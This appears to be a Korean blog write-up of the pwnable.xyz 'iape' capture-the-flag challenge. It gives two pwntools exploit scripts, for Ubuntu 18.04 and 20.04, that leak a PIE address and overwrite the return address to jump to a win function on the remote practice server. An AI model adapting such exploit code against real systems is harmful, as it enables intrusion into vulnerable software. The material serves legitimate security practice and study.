로컬에서는 잘만되는데 리모트에서는 깨진다...하...
버전 문제였던것 같다 18.04버전과 20.02버전에서의 PIE상태가 달라서 문제가 생긴 것 같다
PIE하나 릭한 뒤 ret 주소 덮으면 된다
ubuntu 20.02
from pwn import *
#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30014)
#p = process("./iape")
#gdb.attach(p)
arr_len = 0x400
ret_len = arr_len + 0x10
win_off = 0xb5b
def print_():
p.recvuntil(b"> ")
p.sendline(b"3")
def leak_append():
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"Give me ")
num = int(p.recv(2))
if num >= 14:
p.recvuntil(b"chars: ")
pay = b"A" * 9
pay += b"B"
p.send(pay)
return num
elif num == 0:
return 0
else:
p.send(b"\x00")
return 0
def append(win, payload, buf_len, target_len):
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"Give me ")
num = int(p.recv(2))
p.recvuntil(b"chars: ")
if buf_len + num > target_len - 8:
if num >= 2:
pay = payload[:1]
pay += b"\x00"
p.send(pay)
return 1
elif num == 0:
return 0
else:
p.send(b"\x00")
return 0
else:
if num >= 2:
pay = payload[:num -1]
pay += b"\x00"
p.send(pay)
return num - 1
elif num == 0:
return 0
else:
p.send(b"\x00")
return 0
pie = b"\x00" * 2
buf_len = 0
# PIE leak
while True:
num = leak_append()
if num != 0:
buf_len += num
break
print_()
p.recvuntil(b"B")
pie += p.recv(4)
pie += b"\x00\x00"
pie = u64(pie)
win = pie + win_off
payload = b"A" * (ret_len - 8 - buf_len)
payload += p64(win)
# overwrite ret
while True:
num = append(win, payload, buf_len, ret_len)
buf_len += num
payload = payload[num:]
print(f"length: {len(payload)}")
print(f"{buf_len} / {ret_len}")
#print(f"payload : {payload}")
if buf_len >= ret_len:
break
print("pie: " + hex(pie))
print("win: " + hex(win))
p.recvuntil(b"> ")
p.sendline(b"0")
p.interactive()
ubuntu 18.04
from pwn import *
#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30014)
#p = process("./iape")
#gdb.attach(p)
arr_len = 0x400
ret_len = arr_len + 0x10
win_off = 0xb5b
def print_():
p.recvuntil(b"> ")
p.sendline(b"3")
def leak_append():
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"Give me ")
num = int(p.recv(2))
if num >= 14:
p.recvuntil(b"chars: ")
pay = b"A" * 7
pay += b"B"
p.send(pay)
return num
elif num == 0:
return 0
else:
p.send(b"\x00")
return 0
def append(win, payload, buf_len, target_len):
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"Give me ")
num = int(p.recv(2))
p.recvuntil(b"chars: ")
if buf_len + num > target_len - 8:
if num >= 2:
pay = payload[:1]
pay += b"\x00"
p.send(pay)
return 1
elif num == 0:
return 0
else:
p.send(b"\x00")
return 0
else:
if num >= 2:
pay = payload[:num -1]
pay += b"\x00"
p.send(pay)
return num - 1
elif num == 0:
return 0
else:
p.send(b"\x00")
return 0
buf_len = 0
# PIE leak
while True:
num = leak_append()
if num != 0:
buf_len += num
break
print_()
p.recvuntil(b"B")
leak_pie = p.recv(6)
leak_pie += b"\x00\x00"
leak_pie = u64(leak_pie)
pie = leak_pie - 0xbc2
win = pie + win_off
payload = b"A" * (ret_len - 8 - buf_len)
payload += p64(win)
# overwrite ret
while True:
num = append(win, payload, buf_len, ret_len)
buf_len += num
payload = payload[num:]
print(f"length: {len(payload)}")
print(f"{buf_len} / {ret_len}")
#print(f"payload : {payload}")
if buf_len >= ret_len:
break
print("leak pie: " + hex(leak_pie))
print("pie: " + hex(pie))
print("win: " + hex(win))
p.recvuntil(b"> ")
p.sendline(b"0")
p.interactive()
참...ㅋㅋㅋ
'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / message (0) | 2022.05.20 |
|---|---|
| pwnable.xyz / UAF (0) | 2022.05.19 |
| pwnable.xyz / strcat (0) | 2022.05.18 |
| pwnable.xyz / J-U-M-P (0) | 2022.05.15 |
| pwnable.xyz / sus (0) | 2022.05.14 |
